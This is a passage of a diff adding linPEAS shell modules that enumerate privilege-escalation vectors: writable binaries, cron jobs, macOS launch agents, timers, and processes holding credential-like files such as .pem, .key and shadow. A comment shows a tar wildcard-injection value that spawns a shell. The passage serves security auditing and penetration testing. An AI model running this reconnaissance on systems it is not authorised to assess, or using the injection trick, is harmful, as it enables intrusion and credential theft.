  for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
    # Skip if process doesn't exist or we can't access it
    [ ! -d "/proc/$pid" ] && continue
    [ ! -r "/proc/$pid/maps" ] && continue
    # Get process user and command
    proc_user=$(stat -c '%U' "/proc/$pid" 2>/dev/null)
    proc_cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100)
    [ -z "$proc_user" ] || [ -z "$proc_cmd" ] && continue
    # Check for memory-mapped files that might contain credentials
    cred_files=$(grep -E '\.(pem|key|cred|db|sqlite|conf|cnf|ini|env|secret|token|auth|passwd|shadow)$' "/proc/$pid/maps" 2>/dev/null)
    if [ -n "$cred_files" ]; then
      echo "Process $pid ($proc_user) - $proc_cmd"
      echo "  └─ Has memory-mapped credential files:"
      echo "$cred_files" | while read -r line; do
        filename=$(echo "$line" | sed "s,.*/\(.*\),\1,")
        echo "    └─ $filename"
      done
    fi
  done
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/3_Process_binaries_perms.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/3_Process_binaries_perms.sh
@ -0,0 +1,56 @@
 # Title: Processes & Cron & Services & Timers - Process binaries permissions
 # ID: PR_Process_binaries_perms
 # Author: Carlos Polop
 # Last Update: 2024-03-19
 # Description: Check the permissions of the binaries of the running processes
 # License: GNU GPL
 # Version: 1.2
 # Functions Used: print_2title, print_info
 # Global Variables: $knw_usrs, $nosh_usrs, $NOUSEPS, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $Wfolders
 # Initial Functions:
 # Generated Global Variables: $binW, $bpath, $pid
 # Fat linpeas: 0
 # Small linpeas: 1
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  if [ "$NOUSEPS" ]; then
    print_2title "Binary processes permissions (non 'root root' and not belonging to current user)"
    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes"
    # Get list of writable binaries
    binW=""
    for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
      # Skip if process doesn't exist or we can't access it
      [ ! -r "/proc/$pid/exe" ] && continue
      # Get binary path
      bpath=$(readlink "/proc/$pid/exe" 2>/dev/null)
      [ -z "$bpath" ] && continue
      # Check if binary is writable
      if [ -w "$bpath" ]; then
        if [ -z "$binW" ]; then
          binW="$bpath"
        else
          binW="$binW|$bpath"
        fi
      fi
    done
    # Get and display binary permissions
    for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
      # Skip if process doesn't exist or we can't access it
      [ ! -r "/proc/$pid/exe" ] && continue
      # Get binary path
      bpath=$(readlink "/proc/$pid/exe" 2>/dev/null)
      [ -z "$bpath" ] && continue
      # Display binary permissions if file exists
      if [ -e "$bpath" ]; then
        ls -la "$bpath" 2>/dev/null
      fi
    done | grep -Ev "\sroot\s+root" | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN},"
    echo ""
  fi
 fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/4_Processes_PPID_different_user.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/4_Processes_PPID_different_user.sh
@ -0,0 +1,60 @@
 # Title: Processes & Cron & Services & Timers - Process opened by other users
 # ID: PR_Processes_PPID_different_user
 # Author: Carlos Polop
 # Last Update: 2024-03-19
 # Description: Processes whose PPID belongs to a different user (not root)
 # License: GNU GPL
 # Version: 1.1
 # Functions Used: print_2title, print_info
 # Global Variables: $nosh_usrs, $NOUSEPS, $SEARCH_IN_FOLDER, $sh_usrs, $USER
 # Initial Functions:
 # Generated Global Variables: $ppid_user, $pid, $ppid, $user, $ppid_uid, $user_uid
 # Fat linpeas: 0
 # Small linpeas: 1
 if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then
  print_2title "Processes whose PPID belongs to a different user (not root)"
  print_info "You will know if a user can somehow spawn processes as a different user"
  # Function to get user by PID using /proc
  get_user_by_pid() {
    if [ -r "/proc/$1/status" ]; then
      grep "^Uid:" "/proc/$1/status" 2>/dev/null | awk '{print $2}'
    fi
  }
  # Function to get username by UID
  get_username_by_uid() {
    if [ -r "/etc/passwd" ]; then
      grep "^[^:]*:[^:]*:$1:" "/etc/passwd" 2>/dev/null | cut -d: -f1
    fi
  }
  # Find processes with PPID and user info, then filter those where PPID's user is different from the process's user
  for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
    # Skip if process doesn't exist or we can't access it
    [ ! -r "/proc/$pid/status" ] && continue
    # Get process user
    user_uid=$(get_user_by_pid "$pid")
    [ -z "$user_uid" ] && continue
    user=$(get_username_by_uid "$user_uid")
    [ -z "$user" ] && continue
    # Get PPID
    ppid=$(grep "^PPid:" "/proc/$pid/status" 2>/dev/null | awk '{print $2}')
    [ -z "$ppid" ] || [ "$ppid" = "0" ] && continue
    # Get PPID user
    ppid_uid=$(get_user_by_pid "$ppid")
    [ -z "$ppid_uid" ] && continue
    ppid_user=$(get_username_by_uid "$ppid_uid")
    [ -z "$ppid_user" ] && continue
    # Check if users are different and PPID user is not root
    if [ "$user" != "$ppid_user" ] && [ "$ppid_user" != "root" ]; then
      echo "Proc $pid with ppid $ppid is run by user $user but the ppid user is $ppid_user" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
    fi
  done
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/5_Files_open_process_other_user.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/5_Files_open_process_other_user.sh
@ -0,0 +1,64 @@
 # Title: Processes & Cron & Services & Timers - Files opened by processes belonging to other users
 # ID: PR_Files_open_process_other_user
 # Author: Carlos Polop
 # Last Update: 2024-03-19
 # Description: Files opened by processes belonging to other users
 # License: GNU GPL
 # Version: 1.1
 # Functions Used: print_2title, print_info
 # Global Variables: $IAMROOT, $nosh_usrs, $SEARCH_IN_FOLDER, $sh_usrs, $USER
 # Initial Functions:
 # Generated Global Variables: $user_uid, $pid, $fd_target, $cmd, $user
 # Fat linpeas: 0
 # Small linpeas: 1
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  if ! [ "$IAMROOT" ]; then
    print_2title "Files opened by processes belonging to other users"
    print_info "This is usually empty because of the lack of privileges to read other user processes information"
    # Function to get username by UID
    get_username_by_uid() {
      if [ -r "/etc/passwd" ]; then
        grep "^[^:]*:[^:]*:$1:" "/etc/passwd" 2>/dev/null | cut -d: -f1
      fi
    }
    # Check each process
    for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
      # Skip if process doesn't exist or we can't access it
      [ ! -r "/proc/$pid/status" ] && continue
      [ ! -r "/proc/$pid/fd" ] && continue
      # Get process user
      user_uid=$(grep "^Uid:" "/proc/$pid/status" 2>/dev/null | awk '{print $2}')
      [ -z "$user_uid" ] && continue
      user=$(get_username_by_uid "$user_uid")
      [ -z "$user" ] && continue
      # Skip if process belongs to current user
      [ "$user" = "$USER" ] && continue
      # Get process command
      cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100)
      [ -z "$cmd" ] && continue
      # Check file descriptors
      for fd in /proc/$pid/fd/*; do
        [ ! -e "$fd" ] && continue
        fd_target=$(readlink "$fd" 2>/dev/null)
        [ -z "$fd_target" ] && continue
        # Skip if target doesn't exist or is a special file
        [ ! -e "$fd_target" ] && continue
        case "$fd_target" in
          /dev/*|/proc/*|/sys/*) continue ;;
        esac
        echo "Process $pid ($user) - $cmd"
        echo "  └─ Has open file: $fd_target" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
      done
    done
    echo ""
  fi
 fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/6_Different_procs_1min.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/6_Different_procs_1min.sh
@ -0,0 +1,30 @@
 # Title: Processes & Cron & Services & Timers - Different processes 1 min
 # ID: PR_Different_procs_1min
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Different processes executed during 1 min
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_info
 # Global Variables: $nosh_usrs, $sh_usrs, $Wfolders
 # Initial Functions:
 # Generated Global Variables: $temp_file
 # Fat linpeas: 0
 # Small linpeas: 1
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
    print_2title "Different processes executed during 1 min (interesting is low number of repetitions)"
    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#frequent-cron-jobs"
    temp_file=$(mktemp)
    if [ "$(ps -e -o user,command 2>/dev/null)" ]; then 
      for i in $(seq 1 1210); do 
        ps -e -o user,command >> "$temp_file" 2>/dev/null; sleep 0.05; 
      done;
      sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"; 
      rm "$temp_file";
    fi
    echo ""
  fi
 fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/7_Cron_jobs.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/7_Cron_jobs.sh
@ -0,0 +1,250 @@
 # Title: Processes & Cron & Services & Timers - Cron jobs and Wildcards
 # ID: PR_Cron_jobs
 # Author: Carlos Polop
 # Last Update: 2024-03-19
 # Description: Enumerate system cron jobs and check for privilege escalation vectors
 # License: GNU GPL
 # Version: 1.2
 # Functions Used: echo_not_found, print_2title, print_info
 # Global Variables: $cronjobsG, $nosh_usrs, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $Wfolders, $cronjobsB, $PATH
 # Initial Functions:
 # Generated Global Variables: $cmd, $VAR, $file, $path, $user_crontab, $username, $job_id, $cron_dir, $crontab, $findings, $line, $finding, $bin
 # Fat linpeas: 0
 # Small linpeas: 1
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  print_2title "Check for vulnerable cron jobs"
  print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs"
  print_3title "Cron jobs list"
  command -v crontab 2>/dev/null || echo_not_found "crontab"
  crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
  command -v incrontab 2>/dev/null || echo_not_found "incrontab"
  incrontab -l 2>/dev/null
  ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g"
  cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},"  | sed "s,root,${SED_RED},"
  crontab -l -u "$USER" 2>/dev/null | tr -d "\r"
  ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths
  atq 2>/dev/null
  echo ""
  print_3title "Checking for specific cron jobs vulnerabilities"
  # Function to check if a binary is writable and executable
  check_binary_perms() {
    local bin="$1"
    [ -z "$bin" ] && return
    # Skip if binary doesn't exist
    [ ! -e "$bin" ] && return
    # Check if it's a regular file
    [ ! -f "$bin" ] && return
    # Check if it's writable and executable
    if [ -w "$bin" ]; then
      echo "Writable binary: $bin"
      ls -l "$bin" 2>/dev/null
    fi
  }
  # Function to extract binary path from command
  get_binary_path() {
    local cmd="$1"
    local bin=""
    # Try to get the first word of the command
    bin=$(echo "$cmd" | awk '{print $1}')
    [ -z "$bin" ] && return
    # If it's an absolute path, use it directly
    if [ "$(echo "$bin" | cut -c1)" = "/" ]; then
      echo "$bin"
      return
    fi
    # If it's a relative path, try to resolve it
    if [ -e "$bin" ]; then
      echo "$(pwd)/$bin"
      return
    fi
    # Try to find it in PATH
    for path in $(echo "$PATH" | tr ':' ' '); do
      if [ -x "$path/$bin" ]; then
        echo "$path/$bin"
        return
      fi
    done
  }
  # Function to check for privilege escalation vectors in a command
  check_privesc_vectors() {
    local cmd="$1"
    local file="$2"
    local findings=""
    local bin=""
    # Skip common false positives (mail commands, shell conditionals, variable assignments)
    if echo "$cmd" | grep -qE '^(mail|echo|then|else|fi|if|for|while|do|done|case|esac|exit|return|break|continue|:|\[|test|\[\[|\]\]|true|false|source|\.|cd|pwd|export|unset|readonly|local|declare|typeset|alias|unalias|set|unset|shift|wait|trap|umask|ulimit|exec|eval|command|builtin|let|read|printf|^[[:space:]]*[A-Za-z0-9_]+[[:space:]]*[=:])'; then
      return
    fi
    # Get the binary path
    bin=$(get_binary_path "$cmd")
    if [ -n "$bin" ]; then
      check_binary_perms "$bin"
    fi
    # Check for wildcard injection vectors
    # Attack: Using wildcards in tar/chmod/chown to execute arbitrary commands
    # Example: tar cf archive.tar * (where * expands to --checkpoint=1 --checkpoint-action=exec=sh)
    if echo "$cmd" | grep -qE '\*'; then
      findings="${findings}POTENTIAL_WILDCARD_INJECTION: Command uses wildcards with potentially exploitable command\n"
    fi
    # Check for path hijacking vectors
    # Attack: Using relative paths or commands without full path that can be hijacked
    # Example: script.sh instead of /usr/bin/script.sh
    if echo "$cmd" | grep -qE '^[[:space:]]*[^/][^[:space:]]*[[:space:]]'; then
      # Skip common false positives like shell builtins, control structures, and variable assignments
      # Also skip test commands ([ ]), logical operators (&& ||), and complex shell constructs
      if ! echo "$cmd" | grep -qE '^[[:space:]]*(cd|\.|source|\./|if|then|else|fi|for|while|do|done|case|esac|exit|return|break|continue|:|\[[[:space:]]|test|\[\[|\]\]|true|false|export|unset|readonly|local|declare|typeset|alias|unalias|set|unset|shift|wait|trap|umask|ulimit|exec|eval|command|builtin|let|read|printf|[A-Za-z0-9_]+[[:space:]]*[=:]|&&|\|\||;|\(|\)|\{|\})'; then
        findings="${findings}PATH_HIJACKING: Command uses relative path\n"
      fi
    fi
    # Check for command injection vectors
    # Attack: Using unquoted variables or command substitution that can be injected
    # Example: echo $VAR or echo $(command)
    if echo "$cmd" | grep -qE '\$\{?[A-Za-z0-9_]|\$\(|`'; then
      findings="${findings}COMMAND_INJECTION: Command uses unquoted variables or command substitution\n"
    fi
    # Check for overly permissive commands
    # Attack: Commands that can be used to escalate privileges
    # Example: chmod 777, chown root, etc.
    if echo "$cmd" | grep -qE '\b(chmod\s+[0-7]{3,4}|chown\s+root|chgrp\s+root|sudo|su |pkexec)\b'; then
      findings="${findings}PERMISSIVE_COMMAND: Command modifies permissions or uses privilege escalation tools\n"
    fi
    # If any findings, print them
    if [ -n "$findings" ]; then
      echo "Potential privilege escalation in cron job:"
      echo "  └─ File: $file"
      echo "  └─ Command: $cmd"
      if [ -n "$bin" ]; then
        echo "  └─ Binary: $bin"
      fi
      echo "  └─ Findings:"
      echo "$findings" | while read -r finding; do
        [ -n "$finding" ] && echo "     * $finding"
      done
    fi
  }
  # Check system crontabs
  #echo "Checking system crontabs..."
  #for crontab in /etc/cron.d/* /etc/cron.daily/* /etc/cron.hourly/* /etc/cron.monthly/* /etc/cron.weekly/* /var/spool/cron/crontabs/* /etc/at* /etc/anacrontab /etc/incron.d/* /var/spool/incron/*; do
  #  [ ! -f "$crontab" ] && continue
  #  [ ! -r "$crontab" ] && continue
  #  # Check if the file is writable
  #  if [ -w "$crontab" ]; then
  #    echo "Writable cron file: $crontab"
  #  fi
  #  # Check each line for privilege escalation vectors
  #  while IFS= read -r line || [ -n "$line" ]; do
  #    # Skip comments and empty lines
  #    case "$line" in
  #      \#*|"") continue ;;
  #    esac
  #    # Extract the command part (everything after the time specification)
  #    cmd=$(echo "$line" | sed -E 's/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ [^ ]+ //')
  #    [ -z "$cmd" ] && continue
  #    check_privesc_vectors "$cmd" "$crontab"
  #  done < "$crontab"
  #done
  # Check user crontabs
  #echo "Checking user crontabs..."
  #if command -v crontab >/dev/null 2>&1; then
  #  # Check current user's crontab
  #  crontab -l 2>/dev/null | while IFS= read -r line || [ -n "$line" ]; do
  #    case "$line" in
  #      \#*|"") continue ;;
  #    esac
  #    cmd=$(echo "$line" | sed -E 's/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ [^ ]+ //')
  #    [ -z "$cmd" ] && continue
  #    check_privesc_vectors "$cmd" "current user crontab"
  #  done
  #  # Check other users' crontabs if accessible
  #  for user_crontab in /var/spool/cron/crontabs/*; do
  #    [ ! -f "$user_crontab" ] && continue
  #    [ ! -r "$user_crontab" ] && continue
  #    username=$(basename "$user_crontab")
  #    [ "$username" = "$USER" ] && continue
  #    echo "Found crontab for user: $username"
  #    while IFS= read -r line || [ -n "$line" ]; do
  #      case "$line" in
  #        \#*|"") continue ;;
  #      esac
  #      cmd=$(echo "$line" | sed -E 's/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ [^ ]+ //')
  #      [ -z "$cmd" ] && continue
  #      check_privesc_vectors "$cmd" "$user_crontab"
  #    done < "$user_crontab"
  #  done
  #else
  #  echo_not_found "crontab"
  #fi
  # Check for writable cron directories
  echo "Checking cron directories..."
  for cron_dir in /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly /var/spool/cron/crontabs /usr/lib/cron/tabs /private/var/at/jobs /var/at/tabs /etc/periodic; do
    [ ! -d "$cron_dir" ] && continue
    if [ -w "$cron_dir" ]; then
      echo "Writable cron directory: $cron_dir"
    fi
  done
  # Check for at jobs
  #if command -v atq >/dev/null 2>&1; then
  #  echo "Checking at jobs..."
  #  atq 2>/dev/null | while IFS= read -r line || [ -n "$line" ]; do
  #    [ -z "$line" ] && continue
  #    job_id=$(echo "$line" | awk '{print $1}')
  #    [ -z "$job_id" ] && continue
  #    at -c "$job_id" 2>/dev/null | while IFS= read -r cmd || [ -n "$cmd" ]; do
  #      case "$cmd" in
  #        \#*|"") continue ;;
  #      esac
  #      check_privesc_vectors "$cmd" "at job $job_id"
  #    done
  #  done
  #fi
  # Check for incron jobs
  #if command -v incrontab >/dev/null 2>&1; then
  #  echo "Checking incron jobs..."
  #  incrontab -l 2>/dev/null | while IFS= read -r line || [ -n "$line" ]; do
  #    case "$line" in
  #      \#*|"") continue ;;
  #    esac
  #    cmd=$(echo "$line" | awk '{print $3}')
  #    [ -z "$cmd" ] && continue
  #    check_privesc_vectors "$cmd" "incron job"
  #  done
  #fi
 else
  print_2title "Cron jobs"
  print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs"
  find "$SEARCH_IN_FOLDER" '(' -type d -or -type f ')' '(' -name "cron*" -or -name "anacron" -or -name "anacrontab" -or -name "incron.d" -or -name "incron" -or -name "at" -or -name "periodic" ')' -exec echo {} \; -exec ls -lR {} \;
 fi
 echo ""
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/8_Macos_launch_agents_daemons.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/8_Macos_launch_agents_daemons.sh
@ -0,0 +1,169 @@
 # Title: Processes & Cron & Services & Timers - Third party LaunchAgents & LaunchDemons
 # ID: PR_Macos_launch_agents_daemons
 # Author: Carlos Polop
 # Last Update: 2024-03-19
 # Description: Third party LaunchAgents & LaunchDemons and privilege escalation vectors
 # License: GNU GPL
 # Version: 1.1
 # Functions Used: print_2title, print_info
 # Global Variables: $MACPEAS, $SEARCH_IN_FOLDER
 # Initial Functions:
 # Generated Global Variables: $program, $plist_content, $binary_path, $periodic_dir, $workdir, $startup_dir, $line, $emond_script, $startup_item, $finding, $location, $findings, $login_item, $plist, $periodic_script, $plist_dir
 # Fat linpeas: 0
 # Small linpeas: 0
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  if [ "$MACPEAS" ]; then
    print_2title "Third party LaunchAgents & LaunchDemons"
    print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#launchd"
    print_info "Checking for privilege escalation vectors in LaunchAgents & LaunchDaemons:"
    print_info "1. Writable plist files"
    print_info "2. Writable program binaries"
    print_info "3. Environment variables with sensitive data"
    print_info "4. Unsafe program arguments"
    print_info "5. RunAtLoad with elevated privileges"
    print_info "6. KeepAlive with elevated privileges"
    # Function to check plist content for privilege escalation vectors
    check_plist_content() {
      local plist="$1"
      local findings=""
      # Check for environment variables
      if defaults read "$plist" EnvironmentVariables 2>/dev/null | grep -qE '(PASS|SECRET|KEY|TOKEN|CRED)'; then
        findings="${findings}ENV_VARS: Contains sensitive environment variables\n"
      fi
      # Check for RunAtLoad with elevated privileges
      if defaults read "$plist" RunAtLoad 2>/dev/null | grep -q "true"; then
        if [ -w "$plist" ]; then
          findings="${findings}RUN_AT_LOAD: Runs at load and plist is writable\n"
        fi
      fi
      # Check for KeepAlive with elevated privileges
      if defaults read "$plist" KeepAlive 2>/dev/null | grep -q "true"; then
        if [ -w "$plist" ]; then
          findings="${findings}KEEP_ALIVE: Keeps running and plist is writable\n"
        fi
      fi
      # Check for unsafe program arguments
      if defaults read "$plist" ProgramArguments 2>/dev/null | grep -qE '(sudo|su|chmod|chown|chroot|mount)'; then
        findings="${findings}UNSAFE_ARGS: Uses potentially dangerous program arguments\n"
      fi
      # Check for writable working directory
      if defaults read "$plist" WorkingDirectory 2>/dev/null | grep -qE '^/'; then
        local workdir=$(defaults read "$plist" WorkingDirectory 2>/dev/null)
        if [ -w "$workdir" ]; then
          findings="${findings}WRITABLE_WORKDIR: Working directory is writable\n"
        fi
      fi
      # If any findings, print them
      if [ -n "$findings" ]; then
        echo "Potential privilege escalation in: $plist"
        echo "$findings" | while read -r finding; do
          [ -n "$finding" ] && echo "  └─ $finding"
        done
      fi
    }
    # Check system and user LaunchAgents & LaunchDaemons
    for plist_dir in /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/; do
      [ ! -d "$plist_dir" ] && continue
      echo "Checking $plist_dir..."
      find "$plist_dir" -name "*.plist" 2>/dev/null | while read -r plist; do
        # Check if plist is writable
        if [ -w "$plist" ]; then
          echo "Writable plist: $plist" | sed -${E} "s,.*,${SED_RED_YELLOW},"
        fi
        # Get program path
        program=""
        program=$(defaults read "$plist" Program 2>/dev/null)
        if ! [ "$program" ]; then
          program=$(defaults read "$plist" ProgramArguments 2>/dev/null | grep -Ev "^\(|^\)" | cut -d '"' -f 2)
        fi
        # Check if program is writable
        if [ -n "$program" ] && [ -w "$program" ]; then
          echo "Writable program: $program" | sed -${E} "s,.*,${SED_RED_YELLOW},"
          ls -l "$program" 2>/dev/null
        fi
        # Check plist content for privilege escalation vectors
        check_plist_content "$plist"
      done
    done
    echo ""
    print_2title "StartupItems"
    print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#startup-items"
    for startup_dir in /Library/StartupItems/ /System/Library/StartupItems/; do
      [ ! -d "$startup_dir" ] && continue
      echo "Checking $startup_dir..."
      find "$startup_dir" -type f -executable 2>/dev/null | while read -r startup_item; do
        if [ -w "$startup_item" ]; then
          echo "Writable startup item: $startup_item" | sed -${E} "s,.*,${SED_RED_YELLOW},"
          ls -l "$startup_item" 2>/dev/null
        fi
      done
    done
    echo ""
    print_2title "Login Items"
    print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#startup-items"
    osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null | tr ", " "\n" | while read -r login_item; do
      if [ -n "$login_item" ]; then
        # Try to find the actual binary
        binary_path=$(mdfind "kMDItemDisplayName == '$login_item'" 2>/dev/null | head -n 1)
        if [ -n "$binary_path" ] && [ -w "$binary_path" ]; then
          echo "Writable login item binary: $binary_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"
          ls -l "$binary_path" 2>/dev/null
        fi
      fi
    done
    echo ""
    print_2title "SPStartupItemDataType"
    system_profiler SPStartupItemDataType 2>/dev/null | while read -r line; do
      if echo "$line" | grep -q "Location:"; then
        location=$(echo "$line" | cut -d: -f2- | xargs)
        if [ -w "$location" ]; then
          echo "Writable startup item location: $location" | sed -${E} "s,.*,${SED_RED_YELLOW},"
          ls -l "$location" 2>/dev/null
        fi
      fi
    done
    echo ""
    print_2title "Emond scripts"
    print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#emond"
    if [ -d "/private/var/db/emondClients" ]; then
      find "/private/var/db/emondClients" -type f 2>/dev/null | while read -r emond_script; do
        if [ -w "$emond_script" ]; then
          echo "Writable emond script: $emond_script" | sed -${E} "s,.*,${SED_RED_YELLOW},"
          ls -l "$emond_script" 2>/dev/null
        fi
      done
    fi
    echo ""
    print_2title "Periodic tasks"
    print_info "Checking periodic tasks for privilege escalation vectors"
    for periodic_dir in /etc/periodic/daily /etc/periodic/weekly /etc/periodic/monthly; do
      [ ! -d "$periodic_dir" ] && continue
      echo "Checking $periodic_dir..."
      find "$periodic_dir" -type f -executable 2>/dev/null | while read -r periodic_script; do
        if [ -w "$periodic_script" ]; then
          echo "Writable periodic script: $periodic_script" | sed -${E} "s,.*,${SED_RED_YELLOW},"
          ls -l "$periodic_script" 2>/dev/null
        fi
      done
    done
    echo ""
  fi
 fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/9_System_timers.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/9_System_timers.sh
@ -0,0 +1,156 @@
 # Title: Processes & Cron & Services & Timers - System Timers
 # ID: PR_System_timers
 # Author: Carlos Polop
 # Last Update: 2024-03-19
 # Description: System Timers and privilege escalation vectors
 # License: GNU GPL
 # Version: 1.2
 # Functions Used: echo_not_found, print_2title, print_info, print_3title
 # Global Variables: $SEARCH_IN_FOLDER, $timersG
 # Initial Functions:
 # Generated Global Variables: $timer_unit, $timer_path, $timer_content, $exec_path, $timer_file, $line, $findings, $unit_path, $finding, $service_unit, $timer, $target_unit, $target_file
 # Fat linpeas: 0
 # Small linpeas: 1
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  print_2title "System timers"
  print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers"
  # Function to check timer content for privilege escalation vectors
  check_timer_content() {
    local timer="$1"
    local findings=""
    # Get the service unit this timer activates
    local service_unit=$(systemctl show "$timer" -p Unit 2>/dev/null | cut -d= -f2)
    if [ -n "$service_unit" ]; then
      # Check if the service runs with elevated privileges
      if systemctl show "$service_unit" -p User 2>/dev/null | grep -q "root"; then
        findings="${findings}RUNS_AS_ROOT: Service runs as root\n"
      fi
      # Get the executable path
      local exec_path=$(systemctl show "$service_unit" -p ExecStart 2>/dev/null | cut -d= -f2 | cut -d' ' -f1)
      if [ -n "$exec_path" ]; then
        if [ -w "$exec_path" ]; then
          findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n"
        fi
        # Check for relative paths
        case "$exec_path" in
          /*) : ;; # Absolute path, do nothing
          *) findings="${findings}RELATIVE_PATH: Uses relative path: $exec_path\n" ;;
        esac
      fi
      # Check for unsafe configurations
      if systemctl show "$service_unit" -p ExecStart 2>/dev/null | grep -qE '(chmod|chown|mount|sudo|su)'; then
        findings="${findings}UNSAFE_CMD: Uses potentially dangerous commands\n"
      fi
      # Check for weak permissions
      if [ -e "$exec_path" ] && [ "$(stat -c %a "$exec_path" 2>/dev/null)" = "777" ]; then
        findings="${findings}WEAK_PERMS: Executable has 777 permissions\n"
      fi
    fi
    # If any findings, print them
    if [ -n "$findings" ]; then
      echo "Potential privilege escalation in timer: $timer"
      echo "$findings" | while read -r finding; do
        [ -n "$finding" ] && echo "  └─ $finding"
      done
    fi
  }
  # Function to check timer file for privilege escalation vectors
  check_timer_file() {
    local timer_file="$1"
    local findings=""
    # Check if timer file is writable (following symlinks)
    if [ -L "$timer_file" ]; then
      # If it's a symlink, check the target file
      local target_file=$(readlink -f "$timer_file")
      if [ -w "$target_file" ]; then
